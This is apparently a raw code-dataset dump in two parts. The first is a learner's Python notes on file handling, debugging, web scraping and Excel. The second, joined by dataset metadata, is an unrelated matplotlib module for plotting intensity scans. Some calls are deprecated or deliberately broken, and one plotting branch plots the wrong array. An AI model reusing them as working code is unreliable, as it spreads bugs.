Keys are states and values are their capitals.\ncapitals = {'Alabama': 'Montgomery', 'Alaska': 'Juneau', 'Arizona': 'Phoenix',\n'Arkansas': 'Little Rock', 'California': 'Sacramento', 'Colorado': 'Denver',\n'Connecticut': 'Hartford', 'Delaware': 'Dover', 'Florida': 'Tallahassee',\n'Georgia': 'Atlanta', 'Hawaii': 'Honolulu', 'Idaho': 'Boise', 'Illinois':\n'Springfield', 'Indiana': 'Indianapolis', 'Iowa': 'Des Moines', 'Kansas':\n'Topeka', 'Kentucky': 'Frankfort', 'Louisiana': 'Baton Rouge', 'Maine':\n'Augusta', 'Maryland': 'Annapolis', 'Massachusetts': 'Boston', 'Michigan':\n'Lansing', 'Minnesota': 'Saint Paul', 'Mississippi': 'Jackson', 'Missouri':\n'Jefferson City', 'Montana': 'Helena', 'Nebraska': 'Lincoln', 'Nevada':\n'Carson City', 'New Hampshire': 'Concord', 'New Jersey': 'Trenton', 'New Mexico': 'Santa Fe', 'New York': 'Albany', 'North Carolina': 'Raleigh',\n'North Dakota': 'Bismarck', 'Ohio': 'Columbus', 'Oklahoma': 'Oklahoma City',\n'Oregon': 'Salem', 'Pennsylvania': 'Harrisburg', 'Rhode Island': 'Providence',\n'South Carolina': 'Columbia', 'South Dakota': 'Pierre', 'Tennessee':\n'Nashville', 'Texas': 'Austin', 'Utah': 'Salt Lake City', 'Vermont':\n'Montpelier', 'Virginia': 'Richmond', 'Washington': 'Olympia', 'West Virginia':\n'Charleston', 'Wisconsin': 'Madison', 'Wyoming': 'Cheyenne'}\ncapitals\nfor quizNum in range(35):\n #creates quiz and answer key files\n quizFile = open('capitalsquiz%s.txt' % (quizNum + 1), 'w')\n answerKeyFile = open('capitalsquiz_answers%s.txt' % (quizNum +1), 'w')\n #write out header for this quiz\n quizFile.write('Name:\\n\\nDate:\\n\\nperiod:\\n\\n')\n quizFile.write((' ' * 20)+ 'State Capitals Quiz (Form %s)' % (quizNum +1))\n quizFile.write('\\n\\n')\n #shuffle order of the states\n states = list(capitals.keys())\n random.shuffle(states)\n #loop through all states, 1 question each\n for questionNum in range(50):\n #get right and wrong answers ( 4 total option)\n correctAnswer = capitals[states[questionNum]]\n wrongAnswers = list(capitals.values())\n del wrongAnswers[wrongAnswers.index(correctAnswer)]\n wrongAnswers = random.sample(wrongAnswers, 3)\n answerOptions = wrongAnswers + [correctAnswer]\n random.shuffle(answerOptions)\n #write questions and answer options to the quiz file\n quizFile.write('%s. What is the capital of %s?\\n' % (questionNum + 1,\n states[questionNum]))\n for i in range(4):\n quizFile.write(' %s. %s\\n' % ('ABCD'[i], answerOptions[i]))\n quizFile.write('\\n')\n #write the answer key to a file\n answerKeyFile.write('%s. %s\\n' % (questionNum + 1, 'ABCD'[\n answerOptions.index(correctAnswer)]))\n quizFile.close()\n answerKeyFile.close()\n\n#the bugs were: 'capitalsquiz%.txt' was missing the s conversion, and the\n#answer-option loop hardcoded 'ABCD'[1]/answerOptions[1] instead of using i\n#practice programs skipped\n#end chapter 8\n\n#Start Chapter 9 - Organizing Files\nimport shutil, os\nos.chdir('C:\\\\')\n#moves a copy to the new directory with the same filename\nshutil.copy('C:\\\\spam\\\\spam.txt', 'C:\\\\Delicious')\n#moves a copy to the new directory with a new name\nshutil.copy('C:\\\\spam\\\\eggs.txt', 'C:\\\\Delicious\\\\eggs2.txt')\n#to move an entire tree, (From, to)\nshutil.copytree('C:\\\\bacon', 'C:\\\\Delicious')\n#can move without copy too, shutil.move()\nshutil.move('C:\\\\bacon.txt', 'C:\\\\eggs')\n#careful with move, will overwrite existing files with the same name\n#if you write the wrong name for a directory, will rename the file to that name\n#move() is dumb and will do something no matter what you intended.
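Since shutil.move() overwrites a same-named destination silently, as the note above warns, a small guard can refuse the move instead. A minimal sketch (my own helper, not from the book; the existence check still leaves a small check-then-move race):

import os, shutil

def safe_move(src, dst):
    # when dst is a directory, the real collision is dst/basename(src)
    target = os.path.join(dst, os.path.basename(src)) if os.path.isdir(dst) else dst
    if os.path.exists(target):
        raise FileExistsError('refusing to overwrite ' + target)
    return shutil.move(src, dst)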
\n### Deleting\nos.unlink('path') # will delete the file at path\nos.rmdir('path') # will delete empty folder at path\nshutil.rmtree('path') # will remove the folder and all containing files\n#PERMANENT DELETIONS <<< not recoverable. \n#good way to test for errors, comment out delete lines and print instead\n#Ex:\nimport os\nfor filename in os.listdir():\n if filename.endswith('.rxt'):\n #os.unlink(filename)\n print(filename)\n#this way will print, not delete the files due to TYPO!\n#if working correctly, then can un-comment the os.unlink line\nos.chdir('C:\\\\Users\\\\Matthew\\\\Documents\\\\GitHub\\\\BioInf')\nos.getcwd()\n\nimport send2trash\nbaconFile = open('bacon.txt', 'a') #creates the file\nbaconFile.write('Bacon is not a vegetable.')\nbaconFile.close()\nsend2trash.send2trash('bacon.txt')\n#os.walk() to walk down an entire directory, modifying all folders and files\nos.getcwd()\nimport os\nfor folderName, subfolders, filenames in os.walk('C:\\\\Users\\\\Matthew\\\\Documents\\\\GitHub\\\\BioInf\\\\Delicious'):\n print('The current folder is ' + folderName)\n for subfolder in subfolders:\n print('SUBFOLDER OF ' + folderName + ': ' + subfolder)\n for filename in filenames:\n print('FILE INSIDE ' + folderName + ': ' + filename)\n print('')\n#compressing files with the zipfile module\nimport zipfile, os\nos.chdir('C:\\\\Users\\\\Matthew\\\\Documents\\\\GitHub\\\\BioInf')\nexampleZip = zipfile.ZipFile('potato.zip')\nexampleZip.namelist()\nspamInfo = exampleZip.getinfo('spam.txt')\nspamInfo.file_size\nspamInfo.compress_size\n'Compressed file is %sx smaller!' % (round(spamInfo.file_size / spamInfo.compress_size, 2))\nexampleZip.close()\n#extracting from Zip with extractall()\nimport zipfile, os\nexampleZip = zipfile.ZipFile('potato.zip')\nexampleZip.extractall()\nexampleZip.close()\n#alternatively, extract a single member to a new folder\nimport zipfile, os\nos.chdir('C:\\\\Users\\\\Matthew\\\\Documents\\\\GitHub\\\\BioInf')\nexampleZip = zipfile.ZipFile('potato.zip')\nexampleZip.extract('spam.txt', 'folderZ')\n#done with all that shit, i never zip anyway\n###################\n#page 207\n#Project Renaming dates from US format to EU format. \nimport shutil, os, re\n#creates regex to match files with the american date format\ndatePattern = re.compile(r\"\"\"^(.*?) # all text before the date\n ((0|1)?\\d)- # one or two digits for the month\n ((0|1|2|3)?\\d)- # one or two digits for the day\n ((19|20)\\d\\d) # four digits for the year\n (.*?)$ # all text after the date\n \"\"\", re.VERBOSE)\n#loop over the files in the working directory\nfor amerFilename in os.listdir('.'):\n mo = datePattern.search(amerFilename)\n #skip files without date\n if mo == None:\n continue\n #get the different parts of the filename\n beforePart = mo.group(1)\n monthPart = mo.group(2)\n dayPart = mo.group(4)\n yearPart = mo.group(6)\n afterPart = mo.group(8)\n\n#group numbering in the regex above (don't re-compile it, that would clobber\n#the real pattern): (1) text before the date, (2) month with inner (3),\n#(4) day with inner (5), (6) year with inner (7), (8) text after the date\n#form the new filename and rename the files\n #form euro filenames\neuroFilename= beforePart + dayPart + '-' + monthPart + '-' + yearPart + afterPart\n#get the full, absolute file paths\nabsWorkingDir = os.path.abspath('.')\namerFilename = os.path.join(absWorkingDir, amerFilename)\neuroFilename = os.path.join(absWorkingDir, euroFilename)\n#rename the files\nprint('Renaming \"%s\" to \"%s\"...'
% (amerFilename, euroFilename))\n#shutil.move(amerFilename, euroFilename) # uncomment after testing\n#doesnt work becaue actually needs to run on test files to fill out variables\n#############\n#2nd program: Backing up to ZIP - page 210\n#practice problems skipped for now. \n#End Chapter 9 \n\n\n#Chapter 10 - Debugging - [lots to study and take notes on]\n#Raising an Exception = “Stop running the code in this function\n#and move the program execution to the except statement.”\nraise Exception('This is an error message.') #Exception is case sensitive\n#if no try / except statements, will just display the error message\n#often code that calls a function that is built to handle and exception\ndef boxPrint(symbol, width, height):\n if len(symbol) !=1:\n raise Exception('Symbol must be a single character string.')\n if width <=2:\n raise Exception('Width must be greater than 2.')\n if height <=2:\n raise Exception('Height must be greater than 2.')\n print(symbol*width)\n for i in range(height -2):\n print(symbol + (' ' * (width - 2)) + symbol)\n print(symbol*width)\n#This is now running it multiple times with different parameters\n#'*' 4x4, '0' 20x5, etc.\nfor sym, w, h in(('*', 4, 4), ('0', 20, 5), ('x', 1, 3), ('ZZ', 3, 3)):\n try:\n boxPrint(sym, w, h)\n except Exception as err:\n print('An exception has happened: ' + str(err))\n#try and except allows you to handle errors instead of a whole program crash\n#Getting the traceback as a string:\ndef spam():\n bacon()\ndef bacon():\n raise Exception('This is an error messgage.')\nspam()\n#use traceback to get an error message for debugging without killin a running program\nimport traceback\ntry:\n raise Exception('This is an error message.')\nexcept:\n errorFile = open('errorInfo.txt', 'w')\n errorFile.write(traceback.format_exc())\n errorFile.close()\n print('The traceback info was written to errorInfo.txt.')\n\nimport os\nos.getcwd()\nos.chdir('C:\\\\Users\\\\Matthew\\\\Documents\\\\GitHub\\\\BioInf')\nos.getcwd()\n#I dont understand how the working directory functions. Maybe due to\n#the continued script ive been using for learning.\n#############################\n#Assertions: # Sanity check to see if code isnt doing something obvs wrong\n# Components:\n#• The assert keyword\n#• A condition (that is, an expression that evaluates to True or False)\n#• A comma\n#• A string to display when the condition is False\npodBayDoorStatus = 'open'\nassert podBayDoorStatus == 'open', 'The pod bay doors need to be \"open\".'\npodBayDoorStatus = 'I\\'m sorry Dave. I\\'m afraid I cant do that.'\nassert podBayDoorStatus == 'open', 'The pod bay doors need to be \"open\".'\n#assertions are error checking to make sure that something you are relying\n#upon down the code isnt in a different state from something higher up.\n#for programmer, not user errors\n\n#Assertions can be disabled by passing -O when running python. \n#to speed up programs once debugging is done. \n##################\n#Logging: #similar to prints to ensure a section has run. 
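A practical variation on the logging examples that follow: pointing basicConfig at a file keeps the program's console output clean. A minimal sketch with a made-up log filename; note basicConfig only takes effect the first time it is called in a process:

import logging
logging.basicConfig(filename='myProgramLog.txt', level=logging.DEBUG,
                    format=' %(asctime)s - %(levelname)s - %(message)s')
logging.debug('this record lands in myProgramLog.txt instead of on screen')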
\nimport logging\nlogging.basicConfig(level=logging.DEBUG, format=' %(asctime)s - %(levelname)s - %(message)s')\n#Ex:\nimport logging\nlogging.basicConfig(level=logging.DEBUG, format=' %(asctime)s - %(levelname)s - %(message)s')\nlogging.debug('Start of program')\n\ndef factorial(n):\n logging.debug('Start of factorial(%s%%)' % (n))\n total = 1\n for i in range(n+1):\n total *= i \n logging.debug('i is ' + str(i) + ', total is ' + str(total))\n logging.debug('End of factorial(%s%%)' % (n))\n return total\n\nprint(factorial(5))\nlogging.debug('End of program')\n#Ex:\nimport logging\nlogging.basicConfig(level=logging.DEBUG, format=' %(asctime)s - %(levelname)s - %(message)s')\nlogging.debug('Start of program')\n\ndef factorial(n):\n logging.debug('Start of factorial(%s%%)' % (n))\n total = 1\n for i in range(1, n+1): #fixed this ex\n total *= i \n logging.debug('i is ' + str(i) + ', total is ' + str(total))\n logging.debug('End of factorial(%s%%)' % (n))\n return total\n\nprint(factorial(5))\nlogging.debug('End of program')\n#logging is useful because then print statements dont need to be all over your program to be disabled later.\n#Can cancel all logging outputs with one disable statement\n\n#logging can be at different levels depending on the severity\n#debugging mode (toolbar) can be used to go line by line to evaluate what a program is doing,\n#what every variable is set to at each line etc. \n#skipped for now - not relevant for the moment- also uses idle not spyder\n#Skipped practice problems for same reason.\n#end Chapter 10\n#########################\n\n#Chapter 11 - Web Scraping\n#using a program to download and process content from the web\n\n#Project: mapIt.py with webbrowser module\nimport webbrowser\nwebbrowser.open('http://inventwithpython.com/')\n#example of webbrowser - basically all it does\n#now to make a program to open a map from a place on clipboard\n\n#! python3\n#mapIt.py - Launches a map in the browser using an address from command line\n\nimport webbrowser, sys, pyperclip\nif len(sys.argv) >1:\n #get address from command line\n address = ' '.join(sys.argv[1:])\n#webbrowser to launch web, sys to read command line stuff\n#ensuring the command line arguments (>1) are all accounted for\nelse:\n #get address from clipboard\n address = pyperclip.paste()\nwebbrowser.open('https://www.google.com/maps/place/' + address)\n#\n\n#Downloading files from the web with Requests module\n#requests.get()\nimport requests\nres = requests.get('http://www.gutenberg.org/cache/epub/1112/pg1112.txt')\ntype(res)\n#checking to see if the download has succeeded\nres.status_code == requests.codes.ok\nlen(res.text)\n#checking for errors - always call raise_for_status() after \n#calling requests.get() to make sure download worked b4 continueing\nimport requests\nres = requests.get('https://inventwithpython.com/page_doesnt_exist')\ntry:\n res.raise_for_status()\nexcept Exception as exc:\n print('There was a problem: %s' % (exc))\n#saving downloaded files to the harddrive\n#from here, can open() and write() file, but first need to open in \n #'write binary' mode to keep encoding correct\nimport requests\nres = requests.get('https://www.gutenberg.org/cache/epub/1112/pg1112.txt')\nres.raise_for_status()\nplayFile = open('RomeoAndJuliet.txt', 'wb') #wb for write binary\nfor chunk in res.iter_content(100000):\n playFile.write(chunk)\nplayFile.close()\n#To review, here’s the complete process for downloading and saving a file:\n#1. Call requests.get() to download the file.\n#2. 
\npElems = exampleSoup.select('p')\nstr(pElems[0])\npElems[0].getText()\nstr(pElems[1])\npElems[1].getText()\nstr(pElems[2])\npElems[2].getText()\n#2 projects described: 1) a Google search with automatic link opening in new tabs \n#2) a downloader for all XKCD comics\n#no interest in these ends at the moment, can always return\n#end chapter 11\n\n#Start Chapter 12 - Working with Excel Spreadsheets w openpyxl\n#one excel file is a 'workbook' that can contain multiple 'sheets'\n#columns in letters, rows in numbers - each cell has a coordinate\nimport os\nos.chdir('C:\\\\Users\\\\Matthew\\\\Documents\\\\GitHub\\\\BioInf')\nimport openpyxl\nwb = openpyxl.load_workbook('example.xlsx')\ntype(wb)\n#Book is broken and outdated - great\nfrom openpyxl import load_workbook\nwb = load_workbook('example.xlsx')\nprint(wb.sheetnames)\nsheet3 = wb['Sheet3']\nsheet1 = wb['Sheet1']\nsheet1['A1'].value\nsheet1['B3'].value\nc = sheet1['B1']\nc.value\n'Row ' + str(c.row) + ', Column ' + str(c.column) + ' is ' + c.value\n#c.column is returning an integer in place of the letter.. hmm\n#auto converting?
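\n#[Added note, not from the book] Not auto converting - in newer openpyxl (assuming\n#openpyxl >= 2.6) cell.column returns the 1-based column index as an int, and the\n#letter moved to its own attribute:\nc.column_letter #'B'\n'Row ' + str(c.row) + ', Column ' + c.column_letter + ' is ' + c.value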
\nsheet1['C1'].value\nc.column\n#can specify specific locations by row and column number\nsheet1.cell(row=1, column=2).value\nfor i in range(1, 8, 2): # 1-8, counting by 2's == Only odd #'s\n    print(i, sheet1.cell(row=i, column=2).value)\n#size of sheet commands OLD AND OUTDATED\nsheet1.get_highest_row()\nsheet1.get_highest_column()\n#now:\nsheet1.max_row() #errors\nsheet1.max_row #This works, no () for some reason\n#got the answer - max_row is not a function, it's a value (a property)\nsheet1.max_column\n#rows and columns from sheets\ntuple(sheet1['A1':'C3'])\nfor rowOfCellObjects in sheet1['A1':'C3']:\n    for cellObj in rowOfCellObjects:\n        print(cellObj.coordinate, cellObj.value)\n    print('--- END OF ROW ---')\n\nsheet1[1] #row 1 \nfor i in sheet1[1]:\n    print(i.value)\n\nsheet1.columns[1] #old and broken\n\nlist(sheet1.columns)[1] #new and not broken\nfor obj in list(sheet1.columns)[1]:\n    print(obj.value)\n#Example Project - State Data\nimport pprint #was missing - needed below for pprint.pformat()\nwb = load_workbook('censuspopdata.xlsx')\nprint(wb.sheetnames)\nsheet = wb['Population by Census Tract']\n#now the sheet is called sheet and loaded in ready to go\ncountyData = {} #dictionary with state abbreviations as keys\nprint('Reading rows...')\nfor row in range(2, sheet.max_row +1):\n    state = sheet['B' +str(row)].value\n    county = sheet['C' +str(row)].value\n    pop = sheet['D' +str(row)].value\n    #makes sure key for this state exists\n    countyData.setdefault(state, {})\n    #makes sure key for county in state exists\n    countyData[state].setdefault(county, {'tracts': 0, 'pop': 0})\n    #each row represents one census tract, so increment by 1\n    countyData[state][county]['tracts'] += 1\n    #increase the county pop by the pop in this census tract\n    countyData[state][county]['pop'] += int(pop)\n#all pop data will now be tabulated and keyed by state\n#time to open a new file and write the contents to it - this block only needs to run\n#once, after the loop, so it is not indented into it\nprint('Writing results...')\nresultFile = open('census2010.py', 'w')\nresultFile.write('allData = ' + pprint.pformat(countyData))\nresultFile.close()\nprint('Done.')\nimport census2010\ncensus2010.allData['AK']['Anchorage']\n\n\n\n","sub_path":"ATBS.py","file_name":"ATBS.py","file_ext":"py","file_size_in_byte":38614,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"51952450","text":"#! 
/anaconda3/envs/Flasher/bin/python\n\n# This import registers the 3D projection, but is otherwise unused.\nfrom mpl_toolkits.mplot3d import Axes3D # noqa: F401 unused import\nimport matplotlib.pyplot as plt\nimport matplotlib.dates as md\nfrom matplotlib.patches import Polygon\nfrom matplotlib import colors\nfrom matplotlib import cm\nfrom matplotlib.ticker import LinearLocator, FormatStrFormatter\n\nimport datetime as dt\nimport seaborn as sns\nimport numpy as np\nimport scipy\nimport fitfunction as ff\nimport readout as readout\nfrom xkcd_colors import xkcd_colors\nfrom scipy import optimize\n\n\n\n\ndef plot_intensity_vs_time(time, current, current_std, color, path_to_file, time_label, rel_label):\n # time : time numpy array\n # current : current numpy array\n # std : standard deviation of the measurement numpy array\n # color : color as string type\n # path_to_file : path to the file as string type (usually a element of a file_list)\n # time_label : Boolean (True : print x labels as time format - False : print x labels as index format)\n # rel_label : Boolean (True : compute relative intensity wrt the maximum - False : just the absolute intensity)\n\n # folder and plot_name came from one component of a file list which is a string type, divided into 2 strings\n folder = path_to_file.split(\"/\")[0]\n filename = path_to_file.split(\"/\")[1]\n plot_name = filename.split('.')[0]\n\n ax = plt.gca()\n line_width = 0.4\n\n if time_label:\n plt.xticks(rotation=60)\n xfmt = md.DateFormatter('%Y/%m/%d %H:%M:%S')\n ax.xaxis.set_major_formatter(xfmt)\n if rel_label:\n rel_current = current / np.max(current)\n error_ratio = current_std / current\n index_of_max = np.argmax(current)\n delta_rel_current = rel_current * np.sqrt(error_ratio ** 2 + error_ratio[index_of_max] ** 2)\n\n rel_current *= np.array(100)\n delta_rel_current *= np.array(np.abs(100))\n\n plt.ylabel('Relative Intensity [%]')\n plt.title('Relative Intensity in time : {}'.format(plot_name))\n plt.plot(time, rel_current, '{}'.format(color), marker=',', linewidth=line_width)\n plt.fill_between(time, rel_current - delta_rel_current, rel_current + delta_rel_current, color=sns.xkcd_rgb[\"amber\"])\n plt.savefig('./Output/{}/{}_relative_time_stamps.png'.format(folder, plot_name), bbox_inches='tight')\n else:\n plt.ylabel('Current [nA]')\n plt.title('Intensity in time : {}'.format(plot_name))\n plt.plot(time, current, '{}'.format(color), marker=',', linewidth=line_width)\n plt.fill_between(time, current - current_std, current + current_std, color=sns.xkcd_rgb['amber'])\n plt.savefig('./Output/{}/{}_absolute_time_stamps.png'.format(folder, plot_name), bbox_inches='tight')\n else:\n if rel_label:\n rel_current = current / np.max(current)\n error_ratio = current_std / current\n index_of_max = np.argmax(current)\n delta_rel_current = rel_current * np.sqrt(error_ratio ** 2 + error_ratio[index_of_max] ** 2)\n\n rel_current *= np.array(100)\n delta_rel_current *= np.array(np.abs(100))\n\n plt.ylabel('Relative Intensity [%]')\n plt.title('Relative Intensity in time : {}'.format(plot_name))\n plt.plot(range(len(current)), current, '{}'.format(color), marker=',', linewidth=line_width)\n plt.fill_between(range(len(rel_current)), rel_current - delta_rel_current, rel_current + delta_rel_current, color=sns.xkcd_rgb[\"amber\"])\n plt.savefig('./Output/{}/{}_relative_time_points.png'.format(folder, plot_name), bbox_inches='tight')\n else:\n plt.ylabel('Current [nA]')\n plt.title('Intensity in time : {}'.format(plot_name))\n plt.plot(range(len(current)), 
current, '{}'.format(color), marker=',', linewidth=line_width)\n            plt.fill_between(range(len(current)), current - current_std, current + current_std, color=sns.xkcd_rgb[\"amber\"])\n            plt.savefig('./Output/{}/{}_absolute_time_points.png'.format(folder, plot_name), bbox_inches='tight')\n    plt.setp(ax.get_xticklabels(), rotation=30, ha=\"right\", rotation_mode=\"anchor\")\n    plt.show()\n    plt.clf()\n\n\ndef plot_intensity_scan_xy_2D(xo, xf, yo, yf, z, steps, path_to_file, rel_label, cam_label):\n    # xo : beginning of X-axis\n    # xf : end of X-axis\n    # yo : beginning of Y-axis\n    # yf : end of Y-axis\n    # steps : number of measurements along the X and Y axes (should be equal for both)\n    # path_to_file : path to the file as string type (usually an element of a file_list)\n    # rel_label : Boolean (True : compute relative intensity wrt the maximum - False : just the absolute intensity)\n    # cam_label : Boolean (True : draw camera - False : don't draw camera)\n\n    # folder and plot_name came from one component of a file list which is a string type, divided into 2 strings\n    folder = path_to_file.split(\"/\")[0]\n    filename = path_to_file.split(\"/\")[1]\n    plot_name = filename.split('.')[0]\n\n    prefix = ''\n\n    x = np.linspace(xo, xf, steps)\n    y = np.linspace(yo, yf, steps)\n\n    if rel_label:\n        z = z / np.max(z)\n        z = np.reshape(z, (steps, steps)) * np.array(100)\n        prefix += 'relative'\n    else:\n        z = np.reshape(z, (steps, steps))\n        prefix += 'absolute'\n\n    # We need to take the transpose, otherwise we can't match the actual file position (x,y)\n    z = z.T\n\n    fig, ax = plt.subplots()\n    im = ax.imshow(z, cmap=cm.viridis, interpolation='none', origin='lower', extent=[-15., 315., -15., 315.])\n\n    ax.set_xticks(x)\n    ax.set_yticks(y)\n\n    plt.xlabel('x position [mm]')\n    plt.ylabel('y position [mm]')\n\n    if rel_label:\n        plt.colorbar(im, label='Relative Intensity [%]')\n        plt.title('Relative Data : {}'.format(plot_name))\n        #plt.savefig('./Output/{}/{}_Data_2D_rel.png'.format(folder, plot_name), bbox_inches='tight')\n    else:\n        plt.colorbar(im, label='Intensity [nA]')\n        plt.title('Absolute Data : {}'.format(plot_name))\n        #plt.savefig('./Output/{}/{}_Data_2D.png'.format(folder, plot_name), bbox_inches='tight')\n\n    # Loop over data dimensions and create text annotations.\n    for i, xx in enumerate(x):\n        for j, yy in enumerate(y):\n            text = ax.text(yy, xx, np.around(z[i, j], decimals=2), ha=\"center\", va=\"center\", color=\"black\", size='6')\n\n    fig.tight_layout()\n\n    # Draw the Camera at a distance of 5.6 m wrt the flasher if \"cam_label\" is set True\n    if cam_label:\n        prefix += '_camON'\n        r = 1120. / 2. # mm\n        distance = 5.6 # m ~scaling factor for small angles\n        x_center = 120.\n        y_center = 120.\n\n        angles = np.array((30., 90., 150., 210., 270., 330.)) * (np.pi / 180.)\n        x_position, y_position = [r * np.cos(angles), r * np.sin(angles)]\n\n        points = [[x_position[0], y_position[0]], [x_position[1], y_position[1]], [x_position[2], y_position[2]], [x_position[3], y_position[3]], [x_position[4], y_position[4]], [x_position[5], y_position[5]]] / np.array(distance)\n        points = points + np.array([x_center, y_center])\n        hexagon = Polygon(points, fill=False, edgecolor='black', linestyle='-', linewidth=0.5)\n        #hexagon.set_alpha(0.1)\n        ax.add_patch(hexagon)\n        ax.set_aspect(aspect=1.0)\n        ax.set_xlim((-15, 315))\n        ax.set_ylim((-15, 315))\n        ax.set_aspect(1)\n    else:\n        prefix += '_camOFF'\n\n    plt.savefig('./Output/{}/{}_{}_2D.png'.format(folder, plot_name, prefix), bbox_inches='tight')\n    plt.show()\n    plt.clf()\n\n\n
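# [Added usage sketch - not part of the original module] A minimal synthetic call of\n# the 2D scan plot; the 12x12 grid, the fake currents and the 'Test/fake_scan.txt'\n# path label are made up, and an Output/Test folder is assumed to exist:\nif __name__ == '__main__':\n    demo_steps = 12\n    demo_z = np.random.uniform(40., 60., demo_steps * demo_steps) # fake currents [nA]\n    plot_intensity_scan_xy_2D(0., 300., 0., 300., demo_z, demo_steps,\n                              'Test/fake_scan.txt', rel_label=True, cam_label=True)\n\n\n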
def plot_intensity_scan_xy_3D(xo, xf, yo, yf, z, steps, path_to_file, rel_label):\n    # xo : beginning of X-axis\n    # xf : end of X-axis\n    # yo : beginning of Y-axis\n    # yf : end of Y-axis\n    # steps : number of measurements along the X and Y axes (should be equal for both)\n    # path_to_file : path to the file as string type (usually an element of a file_list)\n    # rel_label : Boolean (True : compute relative intensity wrt the maximum - False : just the absolute intensity)\n\n    # folder and plot_name came from one component of a file list which is a string type, divided into 2 strings\n    folder = path_to_file.split(\"/\")[0]\n    filename = path_to_file.split(\"/\")[1]\n    plot_name = filename.split('.')[0]\n\n    prefix = ''\n\n    fig = plt.figure()\n    ax = fig.gca(projection='3d')\n    ax.view_init(30, -45)\n    xx = x = np.linspace(xo, xf, steps)\n    yy = y = np.linspace(yo, yf, steps)\n    x, y = np.meshgrid(x, y)\n\n    if rel_label:\n        z = z / np.max(z)\n        z = np.reshape(z, (steps, steps)) * np.array(100)\n        prefix += 'relative'\n    else:\n        z = np.reshape(z, (steps, steps))\n        prefix += 'absolute'\n\n    # We need to take the transpose, otherwise we can't match the actual file position (x,y)\n    z = z.T\n\n    surf = ax.plot_surface(x, y, z, cmap=cm.viridis, linewidth=0, antialiased=False)\n    ax.zaxis.set_major_locator(LinearLocator(10))\n\n    ax.set_xticks(xx, minor=False)\n    ax.set_yticks(yy, minor=False)\n\n    ax.zaxis.set_major_formatter(FormatStrFormatter('%.02f'))\n    ax.set_xlabel('X position [mm]')\n    ax.set_ylabel('Y position [mm]')\n    # Add a color bar which maps values to colors.\n    plt.xticks(rotation=10)\n    plt.yticks(rotation=-10)\n    if rel_label:\n        plt.title('Relative Data : {}'.format(plot_name))\n        fig.colorbar(surf, shrink=0.5, aspect=10, label='Relative Intensity [%]')\n    else:\n        plt.title('Absolute Data : {}'.format(plot_name))\n        fig.colorbar(surf, shrink=0.5, aspect=10, label='Intensity [nA]')\n\n    plt.savefig('./Output/{}/{}_{}_3D.png'.format(folder, plot_name, prefix), bbox_inches='tight')\n    plt.show()\n    plt.clf()\n\n\ndef plot_intensity_contour(xo, xf, yo, yf, z, steps, path_to_file, rel_label):\n\n    # folder and plot_name came from one component of a file list which is a string type, divided into 2 strings\n    folder = path_to_file.split(\"/\")[0]\n    filename = path_to_file.split(\"/\")[1]\n    plot_name = filename.split('.')[0]\n\n    fig, ax = plt.subplots()\n    # Draw the contour plots from the relative max. 
intensity\n x = np.linspace(xo, xf, steps)\n y = np.linspace(yo, yf, steps)\n x, y = np.meshgrid(x, y)\n\n if rel_label:\n z = np.reshape(z, (steps, steps)) * np.array(100)\n else:\n z = np.reshape(z, (steps, steps))\n\n # We need to take the transpose, otherwise we can't match the actually file position (x,y)\n z = z.T\n\n cs_levels = 8\n cpf = ax.contourf(x, y, z, levels=cs_levels, cmap=cm.viridis)\n colours = ['w' if level < 0 else 'k' for level in cpf.levels]\n\n cs = ax.contour(x, y, z, levels=cs_levels, colors=colours, extent=[-15, 315, -15, 315])\n ax.set_aspect(aspect=1)\n ax.clabel(cs, inline=1, fontsize=10, colors=colours)\n ax.set_xticks(np.linspace(xo, xf, steps), minor=False)\n ax.set_yticks(np.linspace(yo, yf, steps), minor=False)\n\n plt.xlabel('x position [mm]')\n plt.ylabel('y position [mm]')\n plt.grid()\n\n if rel_label:\n plt.title('Relative Intensity : {}'.format(plot_name))\n fig.colorbar(cpf, cmap=cm.viridis, label='Relative Intensity [%]')\n plt.savefig('./Output/{}/{}_Contour_rel.png'.format(folder, plot_name), bbox_inches='tight')\n else:\n plt.title('Intensity : {}'.format(plot_name))\n fig.colorbar(cpf, cmap=cm.viridis, label='Intensity [nA]')\n plt.savefig('./Output/{}/{}_Contour.png'.format(folder, plot_name), bbox_inches='tight')\n\n plt.savefig('/Users/lonewolf/Desktop/{}_{}_Data_3D.png'.format(folder, plot_name), bbox_inches='tight')\n plt.show()\n plt.clf()\n\n\n\ndef plot_cells(dim_x, dim_y, xo, xf, yo, yf, steps):\n x = np.linspace(xo, xf, steps)\n y = np.linspace(yo, yf, steps)\n matrix_of_cells = (np.arange(0, dim_x * dim_y, 1)).reshape((dim_x, dim_y)).T\n\n # Drawing\n fig, ax = plt.subplots()\n ax = plt.gca()\n\n im = ax.imshow(matrix_of_cells, origin='lower', extent=[-15, 315, -15, 315])\n\n # Loop over data dimensions and create text annotations.\n for i, xx in enumerate(x):\n for j, yy in enumerate(y):\n text = ax.text(yy, xx, matrix_of_cells[i, j], ha=\"center\", va=\"center\", color=\"black\", size='6')\n\n fig.colorbar(im, ax=ax, label='Time [steps]')\n ax.set_xticks(np.linspace(xo, xf, steps))\n ax.set_yticks(np.linspace(xo, xf, steps))\n plt.xlabel('x position [mm]')\n plt.ylabel('y position [mm]')\n plt.title('Channels or cells in surface scan')\n plt.savefig('./Output/Others/Scanned_Surface.png', bbox_inches='tight')\n plt.show()\n plt.clf()\n\ndef plot_current_vs_channel(number_of_cell, current, current_std, path_to_file, color, rel_label):\n # folder and plot_name came from one component of a file list which is a string type, divided into 2 strings\n folder = path_to_file.split(\"/\")[0]\n filename = path_to_file.split(\"/\")[1]\n plot_name = filename.split('.')[0]\n\n cells = np.arange(0, number_of_cell, 1)\n\n if rel_label:\n string = 'relative'\n axis_label = 'Relative Intensity [%]'\n rel_current = current / np.max(current)\n error_ratio = current_std / current\n index_of_max = np.argmax(current)\n delta_rel_current = rel_current * np.sqrt(error_ratio ** 2 + error_ratio[index_of_max] ** 2)\n\n matrix = rel_current * 100\n matrix_std = delta_rel_current * np.abs(100)\n\n else:\n string = 'absolute'\n axis_label = 'Intensity [nA]'\n matrix = current\n matrix_std = current_std\n\n plt.plot(cells, matrix, 'k-', linewidth='0.5', color='black')\n plt.fill_between(cells, matrix - matrix_std, matrix + matrix_std, color=color)\n\n plt.ylabel(axis_label)\n plt.xlabel('Cell number')\n plt.title('{} : {}'.format(folder, plot_name))\n plt.savefig('./Output/{}/{}_{}_current_vs_channels.png'.format(folder, plot_name, string), bbox_inches='tight')\n 
